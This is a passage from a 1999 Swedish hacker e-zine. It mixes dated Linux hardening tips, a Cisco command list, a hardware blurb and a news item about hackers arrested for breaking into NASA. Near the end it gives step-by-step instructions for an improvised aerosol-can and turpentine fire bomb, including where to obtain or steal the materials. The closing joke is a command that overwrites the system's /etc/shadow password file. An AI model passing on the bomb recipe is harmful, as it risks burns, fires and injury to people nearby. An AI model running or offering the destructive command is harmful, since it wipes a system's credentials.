du ska kolla är om LOG_OK_LOGINS är satta på yes, sen kan du sätta
ENABLE_MD5_CRYPT på yes (kryptering är ju bra i alla fall, om det inte är
en fel programmerad förstörande algoritm :I) Om du vill kunna andvända
passwd över 8 tecken så kan du ändra värderna på variblerna PASS_MAX_DAYS,
PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till några lämpliga värden.
I Redhat så öppnar du också /etc/login.defs och sätter variblerna
PASS_MAX_DAYS, PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till det som
känns rätt. Skilladen mellan konfigurationen i Slackware och Redhat är nästan
ingen, configurationen om man vill andvända MD5 görs det i login.defs om man
andvänder Slackware, det configueras vid installation i Redhat. MD5 är en
one-way algoritm som menas att den aldrig kan dekrypteras, algoritmen är inte
hemligt så det som behövs är att skriva ett program som krypterar från en
ordlista och gämnför med de krypterade passwd:et i /etc/passwd eller i
/etc/shadow som är en standardisering för nya Linux system, /etc/shadow kan
dock inte nås av andra andvändare, men det finns tekniker så att man kan
rycka åt sig en skuggad passwd fil. Mer om Password Shadowing ses nedan.
[Password Shadowing]
Det första du ska kolla är att /etc/shadow finns, om inte så har du valt vid
installationen att inte andvända password shadowing och då får du köra
pkgtool och installera de själv. När du installerat pkgtool så fåru köra
kommandona /usr/sbin/pwconv och /usr/sbin/grpconv.
[TCP Wrappers]
Note: Konfigurationen av TCP Wrappers är samma i alla dist.
För det första måste du veta vad en TCP Wrapper är för nåt annars är det
inte så bra, !LOL! jaja, en TCP Wrapper andvänds för att kunna styra vilka
datorer som får andvända vilka tjänster. Detta finns definerat i
/etc/inetd.conf. Det finns två filer som styr detta och det är
/etc/hosts.deny och /etc/hosts.allow. Först ska jag gå igenom hur man låser
datorn för alla utom ett antal IP nummer. Första steget är att öppna
/etc/hosts.deny och skriva in raden ALL: ALL. För att ställa in vilka som
får komma åt din dator editerar du /etc/hosts.allow och skriver in t.ex.
ALL: 10.13.95.03. Istället för ALL så kan man skriva in t.ex. en pop3 server
eller in.telnetd, t.ex. in.telnet.d: 10.13.95.03 eller pop3.ondska.org: IP.
detta. Detta begränsar alltså vilka som får logga in på systemet och vilka
som får läsa sin epost. Du kan också blockera olika IP-nummer men sen tillå-
ta alla andra. Det gör du i /etc/hosts.deny. Editera hosts.deny och skriv
t.ex:
ALL: .hostname.com
ALL: ipnummer
[Anonymous FTP]
Som standard är Anonym FTP påslagen efter installation. Om du tycker det är
läskigt att vem som helst kan logga in som anonymous. Vilka som inte får
logga in anges i /etc/ftpusers. Öppna bara /etc/ftpusers med emacs, vi, pico
eller vad fan du vill och lägg till raderna anonymous och ftp.
[0nda services]
Det finns många services i Linux som skapar möjligheter, för att göra ditt
system en aning säkrare så editerar du /etc/inetd.conf och sätter # framför
alla läskiga tjänster.
Slackware.
För det första ska du studera indetd.conf noga och fundera vad datorn ska
andvändas till och sen stänga av alla onödiga tjänster. Finger, shell, login,
ntalk, systat och netstat bör stängas av och om du andvänder en äldre version
av Slackware så är det också bra att stänga av imapd som va osäker. Telnet
och ftp ska man ta och tänka lite om dom ska va på eller av, eftersom passwd
skickas i klartext och kan enkelt sniffas. Om de verkligen absolut måste and-
vändas..kolla så att du alltid håller den uppdaterad till senaste versionen.
SSH (ftp.sunet.se/pub/security/tools/net) eller Kerberos (http://www.pdc.kth-
.se/kth-krb) är iofs ett bättre alternativ eftersom allt krypteras vid överf-
öringen. Om du inte fattade hur man stände av en tjänst så berättar jag igen,
sätt en # framför den tjänst du vill stänga av och kör killall -HUP inetd för
att uppdatera konfigurationen. Även /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 bör
undersökas där du kan stänga av olika tjänster.
Redhat.
/etc/inetd.conf har samma uppgift som i Slackware.
att uppdatera konfigurationen. Även /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 bör
Gopher, shell, login, talk, ntalk, pop-2, pop-3. finger, time, linuxconf,
imapd. Om du vill andvända pop-3 och imapd så se till att du uppgraderar till
den senaste versionen. Som jag sa förut så skickar telnet o ftp passwdn i
klartext, så om du vill andvända dem så är det bäst att andvända Secure Shell
(SSH) eller Kerberos. Du stänger av tjänsterna genom att sätta en kommentar
(#) framför dem och du uppdaterar inetd med killall -HUP inetd. För att stän-
ga av andra onödiga tjänster kör /usr/sbin/setup och gå in på ntsysv. Stäng
av allt som inte är nödvändigt och för att få information om de olika tjänst-
erna så e det bara att trycka F1.
[Loggfiler]
Det enda sättet att kolla vad som händer på din dator så är det att kolla
loggarna, visserligen finns det scripts som kan rensa dem men det är större
chans att se vad som händer eller hinna det innan dom blir rensade om du kol-
lar dom som en vana. I slackware ligger loggarna /var/log/messages och
/var/log/syslog. Ge kommandot last dagligen också för att kolla vilka som
loggat in på datorn.
I Redhat ligger loggarna i /var/log/messages och /var/log/secure, sen e de
också en bra ide att kolla vilka som loggat in på datorn med kommandot last.
Det finns program som kan undersöka loggarna automatiskt, sånna kan man hitta
på http://www.alw.nih.gov/Security/prog-monitor.html (Swatch och logsurfer)
[Efterord]
Jag vet att detta inte va den bästa artikeln, men information är alltid
information. Om du undrar nåt eller vill ge credits (LOL) så maila keytrace@-
usa.net
-----------------------------------------------------------------------------
Cisco kommando lista
-----------------------------------------------------------------------------
<1-99> - Session number to resume
access-enable - Create a Temporary Access-List
access-profile - Apply user-profile to interface
clear - Reset functions
connect - Open a terminal connection
disable - Turn off privileged commands
disconnect - Disconnect an existing network connection
enable - Turn on privileged commands
exit - Exit from the EXEC
help - Description of the interactive help system
lock - Lock the terminal
Login - Login as an particular user
logout - Same as 'exit'
mrinfo - Request neighbor and version information from a multicast router
mstat - Show statistics after multiple multicast tracerouter
mtrace - Trace revers multicast path from destination to source
name - connection - Name an existing network connection
pad - Open a X.29 PAD connection
ping - Send echo messages
ppp - Start IETF point-to-point protocol (PPP)
resume - Resume an active network connection
rlogin - Open a rlogin connection
show - Show running system information
slip - Start serial-line (SLIP)
systat - Display information about terminal lines
telnet - Open a telnet connection
terminal - Set terminal line parameters
traceroute - Trace route to destination
tunnel - Open a tunnel connection
where - List active connections
x28 - Become an x28 PAD
x3 - Set x3 parameters on PAD
-----------------------------------------------------------------------------
Ethernet kort till Windows CE
-----------------------------------------------------------------------------
Xirom har kommit ut med ett litet batterisnålt Ethernet kort till Windows CE
burkar. CompactCard Ethernet 10 so kortet heter är bara hälften så liten som
ett vanligt PC kort och du kan ansluta dig med 10Mbps och kostar endast och
jätte bara 1 255:- (exkl. moms) ..nä, mer än min veckopeng. Jag tror att man
kan köpa den på ICA, fast kanske inte.
http://www.xircom.com/compactcard/images/cfe-tr.gif
http://www.xircom.com/compactcard/images/cfe-123.jpg
http://www.xircom.com/compactcard/images/cfe-123.jpg
-----------------------------------------------------------------------------
Svenska hackers hackade NASA, busted !
-----------------------------------------------------------------------------
2 Svenska hackers gripna för intrång i NASAS jätte mega hemliga datorer. De
två ungdomarna höll till i en Lägenhet på Söder där allt kretsade kring dato-
rn. En av dom berättade att ta sig in i datorer va som en drog. Dom har bla.
kommit över hemliga säkerhets listor och riskerar nu 2 års fängelse och
skadestånd.
*sörja*
-----------------------------------------------------------------------------
Svin lätt & rolig Bomb
-----------------------------------------------------------------------------
Ok, här kommer ett recept på en tämligen lätt bomb, det finns säkert andra
versioner och former av denna bomb i andra zines. men här kommer den iaf:
Vad du behöver:
1st Axe/hårspray/adidas liknande spray flaska.
½ flaska terpentin eller annan långbrinnade&lätt antändlig vätska
Tändare/Tändstickor.
Hur du gör:
Häll lite terpentin på marken och lägg sedan burken på terpentin vätskan,
häll nu på resten av terpentin flaskan över spray burken, järna lite runtom
oxå. Tänd på och stick iväg ca 10-15meter.
Effekt:
Först när terpentinet har tagit eld och brunnit mellan 1-3 minuter så kommer
en liten knall som oftast följs av en till knall och sedan explosionen som
brukar vara ca 5ggr högre än knallarna, när explosionen kommer så blir det
som ett typ svampmoln av eld ( typ atombomb ) som sträcker sej ca 1½-2 meter
upp i luften. Tänk på att inte så för nära burken, för den kommer flyga i
många delar, och terpentinet som ligger på kommer börja brinna på stället där
burk flisorna landar. Vi gjorde denna bomb i skogen, det blev en grop i
marken ca 10-15cm djup och fläckar med aska över allt inom 5-10 meters radie.
Var hittar jag grejorna:
Terpentin: färghandel, vissa mat affärer.
Spray Flaska: Tänk själv ;)
Tändare: Sno från din kedjerökande mamma eller i affären.
//dthl
-----------------------------------------------------------------------------
Copyright
-----------------------------------------------------------------------------
Zinet för skickas över alla protokoll så länge du INTE ändrar det. Jag har
satt en fet 1337 copyright på detta zine.
Heretics Inc., Outlaw Informativa (C)
-----------------------------------------------------------------------------
3x1t3d(), eller nåt
-----------------------------------------------------------------------------
Jopp, så va sagan slut som dom sa på Björnes Magazine. Jag hoppas att du inte
sörjer. Tänk som min gamla farfar gjorde "0ndska är Kärlek" min farfar va en
0nd jävel. Nej !!! ...Slut på skitsnacket, ta ut snusen och gå och dö och
sluta lyssna på mina dåliga skämt.
# cat /ezine/o-i/outlaw-07 > /etc/shadow
And the story ends...
.-------------------------------------------------------------------------.
| Heretics Inc. Outlaw Informativa issue #7, 22:45 1999-09-08 |
'-------------------------------------------------------------------------'
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0.2i
iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q
X3pmKDomoNWBQp8LyYIdwbqm
=estT
-----END PGP SIGNATURE-----